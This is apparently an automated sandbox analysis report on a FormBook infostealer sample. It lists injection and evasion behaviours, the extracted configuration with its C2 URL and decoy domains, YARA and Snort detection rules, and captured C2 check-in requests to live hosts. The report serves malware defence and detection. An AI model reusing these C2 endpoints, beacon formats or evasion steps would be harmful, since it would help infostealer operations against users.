Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report eQLPRPErea.exe

Overview

General Information

Sample Name:eQLPRPErea.exe
Analysis ID:383832
MD5:2c64897aa30694cc768f5ea375157932
SHA1:c897f37780a5237d5c330bcf2668745201b38ff5
SHA256:18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • eQLPRPErea.exe (PID: 6876 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
    • eQLPRPErea.exe (PID: 6956 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4832 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6616 cmdline: /c del 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.eQLPRPErea.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.eQLPRPErea.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.eQLPRPErea.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.eQLPRPErea.exe.1eb20000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.eQLPRPErea.exe.1eb20000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4Avira URL Cloud: Label: malware
          Source: http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReHAvira URL Cloud: Label: malware
          Source: http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: eQLPRPErea.exeVirustotal: Detection: 28%Perma Link
          Source: eQLPRPErea.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 3.2.eQLPRPErea.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.wlanext.exe.8bf110.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.eQLPRPErea.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.wlanext.exe.3597960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: eQLPRPErea.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: eQLPRPErea.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.stone-master.info/aqu2/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.nagoyadoori.xyz
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1Host: www.biehnrecords.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.bedpee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.pmrack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1Host: www.serversexposed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.heliumhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1Host: www.420vaca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.shujahumayun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1Host: www.dottproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.autobrehna.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.appgusher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1Host: www.biehnrecords.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.bedpee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.pmrack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1Host: www.serversexposed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.heliumhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1Host: www.420vaca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.shujahumayun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1Host: www.dottproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.autobrehna.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.appgusher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
